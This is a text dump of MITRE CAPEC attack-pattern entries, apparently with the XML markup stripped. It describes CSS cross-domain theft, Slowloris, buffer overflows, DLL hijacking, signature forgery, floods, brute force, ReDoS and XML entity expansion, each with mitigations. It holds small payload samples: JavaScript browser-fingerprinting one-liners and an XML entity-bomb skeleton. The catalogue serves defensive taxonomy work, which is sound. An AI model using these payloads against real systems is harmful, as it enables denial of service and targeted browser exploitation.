Attack Pattern
ChildOf
408
Ronen
Cross Site Identification - or - How your social network might expose you when you least expect it
December 27, 2009
http://blog.quaji.com/2009/12/out-of-context-information-disclosure.html
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker makes use of Cascading Style Sheets (CSS) injection to steal data cross domain from the victim's browser. The attack works by abusing the standards relating to loading of CSS: 1. Send cookies on any load of CSS (including cross-domain) 2. When parsing returned CSS ignore all data that does not make sense before a valid CSS descriptor is found by the CSS parser
By having control of some text in the victim's domain, the attacker is able to inject a seemingly valid CSS string. It does not matter if this CSS string is preceded by other data. The CSS parser will still locate the CSS string.
If the attacker is able to control two injection points, one before the cross domain data that the attacker is interested in receiving and the other one after, the attacker can use this attack to steal all of the data in between these two CSS injection points when referencing the injected CSS while performing rendering on the site that the attacker controls. When rendering, the CSS parser will detect the valid CSS string to parse and ignore the data that "does not make sense". That data will simply be rendered. That data is in fact the data that the attacker just stole cross domain.
The stolen data may contain sensitive information, such CSRF protection tokens.
No new lines can be present in the injected CSS string
Proper HTML or URL escaping of the " and ' characters is not present
The attacker has control of two injection points: pre-string and post-string
Medium
High
Ability to craft a CSS injection
Attacker controlled site / page to render a page referencing the injected CSS string
Design: Prior to performing CSS parsing, require the CSS to start with well-formed CSS when it is a cross-domain load and the MIME type is broken. This is a browser level fix.
Implementation: Perform proper HTML encoding and URL escaping
707
Targeted
149
Targeted
177
Targeted
838
Targeted
1000
Attack Pattern
ChildOf
116
1000
Attack Pattern
ChildOf
241
Chris Evans
Generic cross-browser cross-domain theft
December 28, 2009
http://scarybeastsecurity.blogspot.com/2009/12/generic-cross-browser-cross-domain.html
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker performs flooding at the HTTP level to bring down only a particular web application rather than anything listening on a TCP/IP connection. This denial of service attack requires substantially fewer packets to be sent which makes DoS harder to detect. This is an equivalent of SYN flood in HTTP.
The idea is to keep the HTTP session alive indefinitely and then repeat that hundreds of times. This attack targets resource depletion weaknesses in web server software. The web server will wait to attacker's responses on the initiated HTTP sessions while the connection threads are being exhausted.
HTTP protocol is used
Web server used is vulnerable to denial of service via HTTP flooding
Low
Ability to issues hundreds of HTTP requests
Configuration: Configure web server software to limit the waiting period on opened HTTP sessions
Design: Use load balancing mechanisms
770
Targeted
772
Targeted
1000
Attack Pattern
ChildOf
227
Robert Hansen
Slowris HTTP DoS
June 17, 2009
http://ha.ckers.org/blog/20090617/slowloris-http-dos/
CAPEC Content Team
The MITRE Corporation
2014-06-23
In this attack, the target software is given input that the attacker knows will be modified and expanded in size during processing. This attack relies on the target software failing to anticipate that the expanded data may exceed some internal limit, thereby creating a buffer overflow.
Consider parts of the program where user supplied data may be expanded by the program. Use a disassembler and other reverse engineering tools to guide the search.
Find a place where a buffer overflow occurs due to the fact that the new expanded size of the string is not correctly accounted for by the program. This may happen perhaps when the string is copied to another buffer that is big enough to hold the original, but not the expanded string. This may create an opportunity for planting the payload and redirecting program execution to the shell code.
Write the buffer overflow exploit. To be exploitable, the "spill over" amount (e.g. the difference between the expanded string length and the original string length before it was expanded) needs to be sufficient to allow the overflow of the stack return pointer (in the case of a stack overflow), without causing a stack corruption that would crash the program before it gets to execute the shell code. Heap overflow will be more difficult and will require the attacker to get more lucky, by perhaps getting a chance to overwrite some of the accounting information stored as part of using malloc().
The program expands one of the parameters passed to a function with input controlled by the user, but a later function making use of the expanded parameter erroneously considers the original, not the expanded size of the parameter.
The expanded parameter is used in the context where buffer overflow may become possible due to the incorrect understanding of the parameter size (i.e. thinking that it is smaller than it really is).
High
Medium
Injection
Attack Example: FTP glob()
The glob() function in FTP servers has been susceptible to attack as a result of incorrect resizing. This is an ftpd glob() Expansion LIST Heap Overflow Vulnerability. ftp daemon contains a heap-based buffer overflow condition. The overflow occurs when the LIST command is issued with an argument that expands into an oversized string after being processed by glob().
This buffer overflow occurs in memory that is dynamically allocated. It may be possible for attackers to exploit this vulnerability and execute arbitrary code on the affected host.
To exploit this, the attacker must be able to create directories on the target host.
The glob() function is used to expand short-hand notation into complete file names. By sending to the FTP server a request containing a tilde (~) and other wildcard characters in the pathname string, a remote attacker can overflow a buffer and execute arbitrary code on the FTP server to gain root privileges. Once the request is processed, the glob() function expands the user input, which could exceed the expected length. In order to exploit this vulnerability, the attacker must be able to create directories on the FTP server.
[R.47.1][REF-2]
CVE-2001-0249
Buffer overflow in the glob implementation in libc in NetBSD-current before 20050914, and NetBSD 2.* and 3.* before 20061203, as used by the FTP daemon, allows remote authenticated users to execute arbitrary code via a long pathname that results from path expansion.
The limit computation of an internal buffer was done incorrectly. The size of the buffer in byte was used as element count, even though the elements of the buffer are 2 bytes long. Long expanded path names would therefore overflow the buffer.
CVE-2006-6652
High
Finding this particular buffer overflow may not be trivial. Also, stack and especially heap based buffer overflows require a lot of knowledge if the intended goal is arbitrary code execution. Not only that the attacker needs to write the shell code to accomplish his or her goals, but the attacker also needs to find a way to get the program execution to jump to the planted shell code. There also needs to be sufficient room for the payload. So not every buffer overflow will be exploitable, even by a skilled attacker.
Access to the program source or binary. If the program is only available in binary then a disassembler and other reverse engineering tools will be helpful.
Ensure that when parameter expansion happens in the code that the assumptions used to determine the resulting size of the parameter are accurate and that the new size of the parameter is visible to the whole system
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
Availability
DoS: crash / exit / restart
Integrity
Modify memory
Confidentiality
Integrity
Availability
Execute unauthorized code or commands
Run Arbitrary Code
Confidentiality
Read memory
120
Targeted
119
Targeted
118
Targeted
130
Targeted
131
Targeted
74
Targeted
20
Secondary
680
Targeted
697
Targeted
1000
Attack Pattern
ChildOf
100
Penetration
Exploitation
High
High
High
All
All
All
All
C
C++
G. Hoglund
G. McGraw
Exploiting Software: How to Break Code
Addison-Wesley
February 2004
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker is able to leverage access gained to the database to read / write data to the file system, compromise the operating system, create a tunnel for accessing the host machine, and use this access to potentially attack other machines on the same network as the database machine.
Traditionally SQL injections attacks are viewed as a way to gain unauthorized read access to the data stored in the database, modify the data in the database, delete the data, etc. However, almost every data base management system (DBMS) system includes facilities that if compromised allow an attacker complete access to the file system, operating system, and full access to the host running the database. The attacker can then use this privileged access to launch subsequent attacks.
These facilities include dropping into a command shell, creating user defined functions that can call system level libraries present on the host machine, stored procedures, etc.
A vulnerable DBMS is used
A SQL injection exists that gives an attacker access to the database or an attacker has access to the DBMS via other means
Very High
High
Low level knowledge of the various facilities available in different DBMS systems for interacting with the file system and operating system
Design: Follow the defensive programming practices needed to protect an application accessing the database from SQL injection
Configuration: Ensure that the DBMS is patched with the latest security patches
Design: Ensure that the DBMS login used by the application has the lowest possible level of privileges in the DBMS
Design: Ensure that DBMS runs with the lowest possible level of privileges on the host machine and that it runs as a separate user
Usage: Do not use the DBMS machine for anything else other than the database
Usage: Do not place any trust in the database host on the internal network. Authenticate and validate all network activity originating from the database host.
Usage: Use an intrusion detection system to monitor network connections and logs on the database host.
Implementation: Remove / disable all unneeded / unused functions of the DBMS system that may allow an attacker to elevate privileges if compromised
250
Targeted
89
Targeted
1000
Attack Pattern
ChildOf
66
Bernardo Damele Assump ção Guimarães
Advanced SQL Injection to Operating System Full Control
April 10, 2009
http://www.blackhat.com/presentations/bh-europe-09/Guimaraes/Blackhat-europe-09-Damele-SQLInjection-whitepaper.pdf
CAPEC Content Team
The MITRE Corporation
2014-06-23
The attacker exploits the functionality of the Windows DLL loader where the process loading the DLL searches for the DLL to be loaded first in the same directory in which the process binary resides and then in other directories (e.g., System32). Exploitation of this preferential search order can allow an attacker to make the loading process load the attackers' rogue DLL rather than the legitimate DLL.
For instance, an attacker with access to the file system may place a malicious ntshrui.dll in the C:\Windows directory. This DLL normally resides in the System32 folder. Process explorer.exe which also resides in C:\Windows, upon trying to load the ntshrui.dll from the System32 folder will actually load the DLL supplied by the attacker simply because of the preferential search order. Since the attacker has placed its malicious ntshrui.dll in the same directory as the loading explorer.exe process, the DLL supplied by the attacker will be found first and thus loaded in lieu of the legitimate DLL. Since explorer.exe is loaded during the boot cycle, the attackers' malware is guaranteed to execute.
This attack can be leveraged with many different DLLs and with many different loading processes. No forensic trails are left in the system's registry or file system that an incorrect DLL had been loaded.
Windows system is used
Attacker has a mechanism to place its malicious DLLs in the needed location on the file system
Medium
Medium
Ability to create a malicious DLL and get it to the right location on the victim's file system
Design: Fix the Windows loading process to eliminate the preferential search order by looking for DLLs in the precise location where they are expected
Design: Sign system DLLs so that unauthorized DLLs can be detected.
427
Targeted
706
Targeted
1000
Attack Pattern
ChildOf
159
M Trends Report
Mandiant
2011
www.mandiant.com
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker carefully crafts small snippets of Java Script to efficiently detect the type of browser the potential victim is using. Many web-based attacks need prior knowledge of the web browser including the version of browser to ensure successful exploitation of a vulnerability. Having this knowledge allows an attacker to target the victim with attacks that specifically exploit known or zero day weaknesses in the type and version of the browser used by the victim. Automating this process via Java Script as a part of the same delivery system used to exploit the browser is considered more efficient as the attacker can supply a browser fingerprinting method and integrate it with exploit code, all contained in Java Script and in response to the same web page request by the browser.
Victim's browser visits a website that contains attacker's Java Script
Java Script is not disabled in the victim's browser
Low
The following code snippets can be used to detect various browsers:
Javascript
Firefox 2/3
FF=/a/[-1]=='a'
Firefox 3
FF3=(function x(){})[-5]=='x'
Firefox 2
FF2=(function x(){})[-6]=='x'
IE
IE='\v'=='v'
Safari
Saf=/a/.__proto__=='//'
Chrome
Chr=/source/.test((/a/.toString+''))
Opera
Op=/^function \(/.test([].sort)
Configuration: Disable Java Script in the browser
200
Targeted
1000
Attack Pattern
ChildOf
541
Gareth Heyes
Detecting browsers javascript hacks
The Spanner
January 29, 2009
http://www.thespanner.co.uk/2009/01/29/detecting-browsers-javascript-hacks/
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker generates a message or datablock that causes the recipient to believe that the message or datablock was generated and cryptographically signed by an authoritative or reputable source, misleading a victim or victim operating system into performing malicious actions.
The victim or victim system is dependent upon a cryptographic signature-based verification system for validation of one or more security events or actions.
The validation can be bypassed via an attacker-provided signature that makes it appear that the legitimate authoritative or reputable source provided the signature.
Protocol Manipulation
Analysis
API Abuse
Brute Force
Spoofing
An attacker provides a victim with a malicious executable disguised as a legitimate executable from an established software by signing the executable with a forged cryptographic key. The victim's operating system attempts to verify the executable by checking the signature, the signature is considered valid, and the attackers' malicious executable runs.
An attacker exploits weaknesses in a cryptographic algorithm to that allow a private key for a legitimate software vendor to be reconstructed, attacker-created malicious software is cryptographically signed with the reconstructed key, and is installed by the victim operating system disguised as a legitimate software update from the software vendor.
High
Technical understanding of how signature verification algorithms work with data and applications
Access_Control
Authentication
Gain privileges / assume identity
20
Targeted
327
Targeted
290
Targeted
1000
Attack Pattern
ChildOf
151
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker obtains an authoritative or reputable signer's private signature key by theft and then uses this key to forge signatures from the original signer to mislead a victim into performing actions that benefit the attacker.
An authoritative or reputable signer is storing their private signature key with insufficient protection.
High
Medium
Analysis
Spoofing
Low
Knowledge of common location methods and access methods to sensitive data
High
Ability to compromise systems containing sensitive data
Restrict access to private keys from non-supervisory accounts
Restrict access to administrative personnel and processes only
Ensure all remote methods are secured
Ensure all services are patched and up to date
284
Targeted
693
Targeted
216
Targeted
1000
Attack Pattern
ChildOf
473
Sigbjørn Vik
Security breach stopped
http://my.opera.com/securitygroup/blog/2013/06/26/opera-infrastructure-attack
2013-06-26
Patrick Morley
Bit9 and Our Customers’ Security
https://blog.bit9.com/2013/02/08/bit9-and-our-customers-security/
2013-02-08
Brad Arkin
Inappropriate Use of Adobe Code Signing Certificate
http://blogs.adobe.com/asset/2012/09/inappropriate-use-of-adobe-code-signing-certificate.html
2012-09-27
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker exploits a cryptographic weakness in the signature verification algorithm implementation to generate a valid signature without knowing the key.
Recipient is using a weak cryptographic signature verification algorithm or a weak implementation of a cryptographic signature verification algorithm, or the configuration of the recipient's application accepts the use of keys generated using cryptographically weak signature verification algorithms.
High
Low
Protocol Manipulation
Analysis
API Abuse
Brute Force
Spoofing
High
Cryptanalysis of signature verification algorithm
High
Reverse engineering and cryptanalysis of signature verification algorithm implementation
Use programs and products that contain cryptographic elements that have been thoroughly tested for flaws in the signature verification routines.
693
Targeted
CVE-2006-4339
Targeted
1000
Attack Pattern
ChildOf
473
1000
Attack Pattern
ParentOf
459
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker exploits a weakness in the parsing or display code of the recipient software to generate a data blob containing a supposedly valid signature, but the signer's identity is falsely represented, which can lead to the attacker manipulating the recipient software or its victim user to perform compromising actions.
Recipient is using signature verification software that does not clearly indicate potential homographs in the signer identity.
Recipient is using signature verification software that contains a parsing vulnerability, or allows control characters in the signer identity field, such that a signature is mistakenly displayed as valid and from a known or authoritative signer.
High
Low
Protocol Manipulation
Spoofing
High
Attacker needs to understand the layout and composition of data blobs used by the target application.
High
To discover a specific vulnerability, attacker needs to reverse engineer signature parsing, signature verification and signer representation code.
High
Attacker may be required to create malformed data blobs and know how to insert them in a location that the recipient will visit.
Ensure the application is using parsing and data display techniques that will accurately display control characters, international symbols and markings, and ultimately recognize potential homograph attacks.
1000
Attack Pattern
ChildOf
473
Eric Johanson
The state of homograph attacks
http://www.shmoo.com/idn/homograph.txt
2005-02-11
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker exploits the underlying complexity of a data structure that allows for both signed and unsigned content, to cause unsigned data to be processed as though it were signed data.
Signer and recipient are using complex data storage structures that allow for a mix between signed and unsigned data
Recipient is using signature verification software that does not maintain separation between signed and unsigned data once the signature has been verified.
High
Low
Protocol Manipulation
Analysis
API Abuse
Spoofing
High
The attacker may need to continuously monitor a stream of signed data, waiting for an exploitable message to appear.
High
Attacker must be able to create malformed data blobs and know how to insert them in a location that the recipient will visit.
Ensure the application is fully patched and does not allow the processing of unsigned data as if it is signed data.
693
Targeted
311
Targeted
319
Targeted
CVE-2007-1263
Targeted
CVE-2010-3618
Targeted
CVE-2012-6359
Targeted
1000
Attack Pattern
ChildOf
473
CAPEC Content Team
The MITRE Corporation
2014-06-23
This attack relies on client side code to access local files and resources instead of URLs. When the client browser is expecting a URL string, but instead receives a request for a local file, that execution is likely to occur in the browser process space with the browser's authority to local files. The attacker can send the results of this request to the local files out to a site that they control. This attack may be used to steal sensitive authentication data (either local or remote), or to gain system profile information to launch further attacks.
The victim's software must not differentiate between the location and type of reference passed the client software, e.g. browser
High
High
API Abuse
Modification of Resources
Protocol Manipulation
J2EE applications frequently use .properties files to store configuration information including JDBC connections, LDAP connection strings, proxy information, system passwords and other system metadata that is valuable to attackers looking to probe the system or bypass policy enforcement points. When these files are stored in publicly accessible directories and are allowed to be read by the public user, then an attacker can list the directory identify a .properties file and simply load its contents in the browser listing its contents. A standard Hibernate properties file contains
hibernate.connection.driver_class = org.postgresql.Driver
hibernate.connection.url = jdbc:postgresql://localhost/mydatabase
hibernate.connection.username = username
hibernate.connection.password = password
hibernate.c3p0.min_size=5
hibernate.c3p0.max_size=20
Even if the attacker cannot write this file, there is plenty of information to leverage to gain further access.
Medium
Attacker identifies known local files to exploit
Implementation: Ensure all content that is delivered to client is sanitized against an acceptable content specification.
Implementation: Ensure all configuration files and resource are either removed or protected when promoting code into production.
Design: Use browser technologies that do not allow client side scripting.
Implementation: Perform input validation for all remote content.
Implementation: Perform output validation for all remote content.
Implementation: Disable scripting languages such as JavaScript in browser
Confidentiality
Read application data
Integrity
Modify application data
241
Targeted
706
Targeted
1000
Category
ChildOf
210
Exploitation
High
High
Low
All
All
All
All
G. Hoglund
G. McGraw
Exploiting Software: How to Break Code
Addison-Wesley
February 2004
CAPEC Content Team
The MITRE Corporation
2014-06-23
An adversary may execute a flooding attack using the TCP protocol with the intent to deny legitimate users access to a service. These attacks exploit the weakness within the TCP protocol where there is some state information for the connection the server needs to maintain.
This type of an attack requires the ability to generate a large amount of TCP traffic to send to the target port of a functioning server.
To mitigate this type of an attack, an organization can monitor incoming packets and look for patterns in the TCP traffic to determine if the network is under an attack. The potential target may implement a rate limit on TCP SYN messages which would provide limited capabilities while under attack.
1000
Attack Pattern
ChildOf
125
CAPEC Content Team
The MITRE Corporation
2014-06-23
Client applications such as web browsers that process HTML data often need to transform data in and out of the XML format by using an XML parser. It may be possible for an attacker to inject data that may have an adverse effect on the XML parser when it is being processed. These adverse effects may include the parser crashing, consuming too much of a resource, executing too slowly, executing code supplied by an attacker, allowing usage of unintended system functionality, etc. An attacker's goal is to leverage parser failure to his or her advantage. In some cases it may be possible to jump from the data plane to the control plane via bad data being passed to an XML parser. [R.484.1]
An attacker determines the input data stream that is being processed by an XML parser on the victim's side.
An attacker crafts input data that may have an adverse effect on the operation of the XML parser when the data is parsed on the victim's system.
An application uses an XML parser to perform transformation on user-controllable data.
An application does not perform sufficient validation to ensure that user-controllable data is safe for an XML parser.
Medium
Injection
API Abuse
"A remote code execution vulnerability exists in the way that Microsoft Windows parses XML content. The vulnerability may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the logged-on user.
In a web-based attack scenario, an attacker would have to host a website that contains a specially crafted webpage that is used to exploit this vulnerability. An attacker would have no way to force users to visit such a website. Instead, an attacker would have to convince users to visit the website, typically by getting them to click a link in an email message or Instant Messenger message that takes the user to the attackers' website." [R.484.2]
CVE-2013-0006
CVE-2013-0007
High
Arbitrary code execution
The client software crashes after visiting a URL downloaded from a hostile server.
Carefully validate and sanitize all user-controllable data prior to passing it to the XML parser routine. Ensure that the resultant data is safe to pass to the XML parser.
The client software should have the latest patches and should be audited for vulnerabilities before being used to communicate with potentially hostile servers.
Availability
DoS: resource consumption (memory)
Confidentiality
Read memory
Confidentiality
Integrity
Availability
Execute unauthorized code or commands
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
Client software that parses XML data included in HTML data.
User-controllable XML code
The XML parser code.
112
Targeted
20
Targeted
19
Targeted
1000
Attack Pattern
ChildOf
82
Penetration
Exploitation
Medium
High
High
Client-Server
All
All
All
Shlomo, Yona
XML Parser Attacks: A summary of ways to attack an XML Parser
What is an XML Parser Attack?
2007
http://yeda.cs.technion.ac.il/~yona/talks/xml_parser_attacks/slides/slide2.html
Microsoft Security Bulletin MS13-002
Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code Execution
Version 1.1
Microsoft Security Response Center Archive
Microsoft
January 8, 2013
http://technet.microsoft.com/en-us/security/bulletin/ms13-002
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker obtains an authoritative or reputable signer's private signature key by exploiting a cryptographic weakness in the signature algorithm or pseudorandom number generation and then uses this key to forge signatures from the original signer to mislead a victim into performing actions that benefit the attacker.
An authoritative signer is using a weak method of random number generation or weak signing software that causes key leakage or permits key inference.
An authoritative signer is using a signature algorithm with a direct weakness or with poorly chosen parameters that enable the key to be recovered using signatures from that signer.
High
Low
Protocol Manipulation
Analysis
API Abuse
Brute Force
Spoofing
High
Cryptanalysis of signature generation algorithm
High
Reverse engineering and cryptanalysis of signature generation algorithm implementation and random number generation
High
Ability to create malformed data blobs and know how to present them directly or indirectly to a victim.
Ensure cryptographic elements have been sufficiently tested for weaknesses.
330
Secondary
310
Secondary
CVE-2008-0166
Targeted
CVE-2007-3108
Targeted
1000
Attack Pattern
ChildOf
473
P.J. Leadbitter
D. Page
N.P. Smart
Attacking DSA Under a Repeated Bits Assumption
http://www.iacr.org/archive/ches2004/31560428/31560428.pdf
2004-07
Debian Security
DSA-1571-1 openssl -- predictable random number generator
http://www.debian.org/security/2008/dsa-1571
2008-05-13
CAPEC Content Team
The MITRE Corporation
2014-06-23
An adversary may execute a flooding attack using the UDP protocol with the intent to deny legitimate users access to a service by consuming the available network bandwidth. Additionally, firewalls often open a port for each UDP connection destined for a service with an open UDP port, meaning the firewalls in essence save the connection state thus the high packet nature of a UDP flood can also overwhelm resources allocated to the firewall. UDP attacks can also target services like DNS or VoIP which utilize these protocols. Additionally, due to the session-less nature of the UDP protocol, the source of a packet is easily spoofed making it difficult to find the source of the attack.
This type of an attack requires the ability to generate a large amount of UDP traffic to send to the desired port of a target service using UDP.
To mitigate this type of an attack, modern firewalls drop UDP traffic destined for closed ports, and unsolicited UDP reply packets. A variety of other countermeasures such as universal reverse path forwarding and remote triggered black holing(RFC3704) along with modifications to BGP like black hole routing and sinkhole routing(RFC3882) help mitigate the spoofed source IP nature of these attacks.
1000
Attack Pattern
ChildOf
125
CAPEC Content Team
The MITRE Corporation
2014-06-23
An adversary may execute a flooding attack using the ICMP protocol with the intent to deny legitimate users access to a service by consuming the available network bandwidth. A typical attack involves a victim server receiving ICMP packets at a high rate from a wide range of source addresses. Additionally, due to the session-less nature of the ICMP protocol, the source of a packet is easily spoofed making it difficult to find the source of the attack.
This type of an attack requires the ability to generate a large amount of ICMP traffic to send to the target server.
To mitigate this type of an attack, an organization can enable ingress filtering. Additionally modifications to BGP like black hole routing and sinkhole routing(RFC3882) help mitigate the spoofed source IP nature of these attacks.
1000
Attack Pattern
ChildOf
125
CAPEC Content Team
The MITRE Corporation
2014-06-23
An adversary may execute a flooding attack using the HTTP protocol with the intent to deny legitimate users access to a service by consuming resources at the application layer such as web services and their infrastructure. These attacks use legitimate session-based HTTP GET requests designed to consume large amounts of a server's resources. Since these are legitimate sessions this attack is very difficult to detect.
This type of an attack requires the ability to generate a large amount of HTTP traffic to send to a target server.
To mitigate this type of an attack, an organization can monitor the typical traffic flow. When spikes in usage occur, filters could examine traffic for indicators of bad behavior with respect to the web servers, and then create firewall rules to deny the malicious IP addresses. These patterns in the filter could be a combination of trained behavior, knowledge of standards as they apply to the web server, known patterns, or anomaly detection. Firewalling source IPs works since the HTTP is sent using TCP so the source IP can't be spoofed; if the source IP is spoofed is, then it's not legitimate traffic. Special care should be taken care with rule sets to ensure low false positive rates along with a method at the application layer to allow a valid user to begin using the service again. Another possible solution is using 3rd party providers as they have experts, knowledge, experience, and resources to deal with the attack and mitigate it before hand or while it occurs. The best mitigation is preparation before an attack, but there is no bulletproof solution as with ample resources a brute force attack may succeed.
1000
Attack Pattern
ChildOf
125
All
CAPEC Content Team
The MITRE Corporation
2014-06-23
An adversary may execute a flooding attack using the SSL protocol with the intent to deny legitimate users access to a service by consuming all the available resources on the server side. These attacks take advantage of the asymmetric relationship between the processing power used by the client and the processing power used by the server to create a secure connection. In this manner the attacker can make a large number of HTTPS requests on a low provisioned machine to tie up a disproportionately large number of resources on the server. The clients then continue to keep renegotiating the SSL connection. When multiplied by a large number of attacking machines, this attack can result in a crash or loss of service to legitimate users.
This type of an attack requires the ability to generate a large amount of SSL traffic to send a target server.
To mitigate this type of an attack, an organization can create rule based filters to silently drop connections if too many are attempted in a certain time period.
1000
Attack Pattern
ChildOf
125
CAPEC Content Team
The MITRE Corporation
2014-06-23
In this attack, the attacker tries every possible value for a password until they succeed. A brute force attack, if feasible computationally, will always be successful because it will essentially go through all possible passwords given the alphabet used (lower case letters, upper case letters, numbers, symbols, etc.) and the maximum length of the password.
A system will be particularly vulnerable to this type of an attack if it does not have a proper enforcement mechanism in place to ensure that passwords selected by users are strong passwords that comply with an adequate password policy.
In practice a pure brute force attack on passwords is rarely used, unless the password is suspected to be weak. Other password cracking methods exist that are far more effective (e.g. dictionary attacks, rainbow tables, etc.).
Determine application's/system's password policy
Determine the password policies of the target application/system.
Determine minimum and maximum allowed password lengths.
env-All
Determine format of allowed passwords (whether they are required or allowed to contain numbers, special characters, etc.).
env-All
Determine account lockout policy (a strict account lockout policy will prevent brute force attacks).
env-All
Passwords are used in the application/system
env-All
Passwords are not used for authentication; however, brute forcing of other protection mechanisms may also be possible.
env-All
Brute force password
Given the finite space of possible passwords dictated by the password policy determined in the previous step, try all possible passwords for a known user ID until application/system grants access.
Manually or automatically enter all possible passwords through the application/system's interface. In most systems, start with the shortest and simplest possible passwords, because most users tend to select such passwords if allowed to do so.
env-All
Perform an offline dictionary attack or a rainbow table attack against a known password hash.
env-All
Weak passwords allowed, and no account lockout policy enforced.
env-All
Password hashes can be captured by attacker.
env-All
Accounts locked out after small number of failed authentication attempts.
env-All
Attacker determines correct password for a user ID and obtains access to application or system.
Attacker is unable to determine correct password for a user ID and obtain access to application or system.
Attacker locks out account while attempting to brute force its password.
Large number of authentication failures in logs.
Enforce strict account lockout policies.
Enforce strong passwords (having sufficient length and containing mix of lower case and upper case letters, numbers, and special characters)
Deny login attempts from sources that produce too many failed attempts. Note that this may cause problems where many users may have the same "source" as far as the application/system is concerned (e.g. a lot of users behind a NAT device).
An attacker needs to know a username to target.
The system uses password based authentication as the one factor authentication mechanism.
An application does not have a password throttling mechanism in place. A good password throttling mechanism will make it almost impossible computationally to brute force a password as it may either lock out the user after a certain number of incorrect attempts or introduce time out periods. Both of these would make a brute force attack impractical.
High
Medium
Brute Force
A system does not enforce a strong password policy and the user picks a five letter password consisting of lower case English letters only. The system does not implement any password throttling mechanism. Assuming the attacker does not know the length of the users' password, an attacker can brute force this password in maximum 1+26+26^2+26^3+26^4+26^5 = 1 + 26 + 676 + 17576 + 456976 + 11,881,376 = 12,356,631 attempts, and half these tries (6,178,316) on average. Using modern hardware this attack is trivial. If the attacker were to assume that the user password could also contain upper case letters (and it was case sensitive) and/or numbers, than the number of trials would have been larger.
An attacker's job would have most likely been even easier because many users who choose easy to brute force passwords like this are also likely to use a word that can be found in the dictionary. Since there are far fewer valid English words containing up to five letters than 12,356,631, an attack that tries each of the entries in the English dictionary would go even faster.
A weakness exists in the automatic password generation routine of Mailman prior to 2.1.5 that causes only about five million different passwords to be generated. This makes it easy to brute force the password for all users who decided to let Mailman automatically generate their passwords for them. Users who chose their own passwords during the sign up process would not have been affected (assuming that they chose strong passwords).
CVE-2004-1143
Low
A brute force attack is very straightforward. A variety of password cracking tools are widely available.
A powerful enough computer for the job with sufficient CPU, RAM and HD. Exact requirements will depend on the size of the brute force job and the time requirement for completion. Some brute forcing jobs may require grid or distributed computing (e.g. DES Challenge).
Many incorrect login attempts are detected by the system.
Try to spoof IP addresses so that it does not look like the incorrect log in attempts are coming from the same computer.
Implement a password throttling mechanism. This mechanism should take into account both the IP address and the log in name of the user.
Put together a strong password policy and make sure that all user created passwords comply with it. Alternatively automatically generate strong passwords for users.
Passwords need to be recycled to prevent aging, that is every once in a while a new password must be chosen.
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
521
Targeted
262
Targeted
263
Targeted
257
Targeted
693
Targeted
1000
Attack Pattern
ChildOf
112
Penetration
High
High
Low
All
All
All
All
CAPEC Content Team
The MITRE Corporation
2014-06-23
An adversary may execute an amplification where the size of a response is far greater than that of the request that generates it. The goal of this attack is to use a relatively few resources to create a large amount of traffic against a target server. To execute this attack, an adversary send a request to a 3rd party service, spoofing the source address to be that of the target server. The larger response that is generated by the 3rd party service is then sent to the target server. By sending a large number of initial requests, the adversary can generate a tremendous amount of traffic directed at the target. The greater the discrepancy in size between the initial request and the final payload delivered to the target increased the effectiveness of this attack.
This type of an attack requires the existence of a 3rd party service that generates a response that is significantly larger than the request that triggers it.
To mitigate this type of an attack, an organization can attempt to identify the 3rd party services being used in an active attack and blocking them until the attack ends. This can be accomplished by filtering traffic for suspicious message patterns such as a spike in traffic where each response contains the same large block of data. Care should be taken to prevent false positive rates so legitimate traffic isn't blocked.
CAPEC Content Team
The MITRE Corporation
2014-06-23
An adversary exploits a few properties of XML(substitution entities and inline DTDs) to cause a denial of service situation due to excessive memory being allocated to fully expand the XML. The result of this denial of service could cause the application to freeze or crash.
This type of attack requires a server that accepts XML data and parses the data.
In this example the attacker defines one large entity and refers to it many times.
<?xml version="1.0"?>
<!DOCTYPE bomb [<!ENTITY x "AAAAA
... [100K of them] ...
AAAA">]>
<boom>
<bang>&x;&x;
... [100K of them]...
&x;&x;</bang>
</boom>
This results in a relatively small message of 100KBs that will expand to a message in the GB range.
Design: Use libraries and templates that minimize unfiltered input. Use methods that limit entity expansion and throw exceptions on attempted entity expansion.
Implementation: Disable altogether the use of inline DTD schemas in your XML parsing objects. If must use DTD, normalize, filter and white list and parse with methods and routines that will detect entity expansion from untrusted sources.
1000
Attack Pattern
ChildOf
230
CAPEC Content Team
The MITRE Corporation
2014-06-23
An adversary may execute an attack on a program that uses a poor Regular Expression(Regex) implementation by choosing input that results in an extreme situation for the Regex. A typical extreme situation operates at exponential time compared to the input size. This is due to most implementations using a Nondeterministic Finite Automaton(NFA) state machine to be built by the Regex algorithm since NFA allows backtracking and thus more complex regular expressions. The algorithm builds a finite state machine and based on the input transitions through all the states until the end of the input is reached. NFA engines may evaluate each character in the input string multiple times during the backtracking. The algorithm tries each path through the NFA one by one until a match is found; the malicious input is crafted so every path is tried which results in a failure. Exploitation of the Regex results in programs hanging or taking a very long time to complete. These attacks may target various layers of the Internet due to regular expressions being used in validation.
This type of an attack requires the ability to identify hosts running a poorly implemented Regex, and the ability to send crafted input to exploit the regular expression.
Test custom written Regex with fuzzing to determine if the Regex is a poor one. Add timeouts to processes that handle the Regex logic. If an evil Regex is found rewrite it as a good Regex.
1000
Attack Pattern
ChildOf
130
Bryan Sullivan
Regular Expression Denial of Service Attacks and Defenses
http://msdn.microsoft.com/en-au/magazine/ff646973.aspx
CAPEC Content Team
The MITRE Corporation
2014-06-23
An adversary may execute an attack on a web service that uses SOAP messages in communication. By sending a very large SOAP array declaration to the web service, the attacker forces the web service to allocate space for the array elements before they are parsed by the XML parser. The attacker message is typically small in size containing a large array declaration of say 1,000,000 elements and a couple of array elements. This attack targets exhaustion of the memory resources of the web service.
This type of an attack requires the attacker to know the endpoint of the web service, and be able to reach the endpoint with a malicious SOAP message.
